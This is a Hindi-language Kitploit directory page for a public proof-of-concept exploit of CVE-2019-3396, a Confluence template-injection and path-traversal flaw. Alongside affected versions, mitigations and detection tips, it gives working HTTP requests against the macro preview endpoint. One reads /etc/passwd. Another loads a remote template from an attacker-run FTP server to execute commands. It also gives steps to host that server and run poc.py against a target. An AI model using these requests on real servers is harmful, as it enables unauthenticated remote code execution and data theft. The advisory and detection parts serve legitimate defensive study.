Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-3396 — CVE-2019-3396 confluence SSTI RCE | Kitploit
उपकरण/GitHubGitHub/kh4sh3i/cve-2019-3396
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubkh4sh3i/cve-2019-3396

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

रिपॉजिटरी देखें
211 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

🔎 CVE-2019-3396 क्या है?

  • एक गंभीर Confluence बग (Atlassian)।
  • प्रकार: Template Injection + Path Traversal।
  • जोखिम: Remote Code Execution (RCE) बिना लॉगिन के।
  • स्थिति: जंगली में शोषित।

🛑 प्रभावित संस्करण

  • 6.6.0 → 6.6.11 ❌ कमजोर
  • 6.6.12 ✅ ठीक किया गया
  • 6.12.0 → 6.12.2 ❌ कमजोर
  • 6.12.3 ✅ ठीक किया गया
  • 6.13.0 → 6.13.2 ❌ कमजोर
  • 6.13.3 ✅ ठीक किया गया
  • 6.14.0 → 6.14.1 ❌ कमजोर
  • 6.14.2 ✅ ठीक किया गया

👉 पूर्ण विवरण के लिए हमेशा Atlassian की आधिकारिक सलाह जांचें।


💥 प्रभाव

  • पूर्ण सर्वर अधिग्रहण
  • डेटा चोरी, ransomware, crypto-miners
  • हमलावर कोई भी कोड चला सकते हैं जो वे चाहते हैं

🔐 शमन

  • ✅ अपग्रेड करें पैच किए गए Confluence संस्करण में (सबसे अच्छा समाधान)
  • 🚫 यदि आप तुरंत पैच नहीं कर सकते तो Widget Connector मैक्रो को अक्षम करें
  • 🔒 पहुंच सीमित करें (ठीक होने तक केवल आंतरिक)

👀 पहचान (सुरक्षित सुझाव)

टूल डाउनलोड करें
  • मैक्रो/प्रीव्यू एंडपॉइंट्स पर अजीब अनुरोधों के लिए लॉग देखें
  • असामान्य प्रक्रियाओं या बाहरी ट्रैफ़िक की तलाश करें
  • संस्करण की पुष्टि करने के लिए भेद्यता स्कैनर का उपयोग करें

📂 फ़ाइल पढ़ें

root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}

कमांड निष्पादित करें

root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}

स्वचालन

  • अपने VPS पर cmd.vm अपलोड करें
  • इस cmd.vm फ़ाइल का लिंक बनाने के लिए ftp या https का उपयोग करें
root@kitploit:~
pip install pyftpdlib
python -m pyftpdlib -p  8888
  • poc.py फ़ाइल को pyftp = "ftp://10.100.10.100:8888/cmd.vm" के नए मान से अपडेट करें
root@kitploit:~
python poc.py <url> <cmd>
python poc.py https://ip:port  "id"

⚠️ सुझाव — यह रेपो केवल शिक्षा, रक्षा और जागरूकता के लिए है।


🔗 संदर्भ

  • Atlassian सलाह 🏢
  • CVE-2019-3396 के लिए NVD प्रविष्टि 🛡️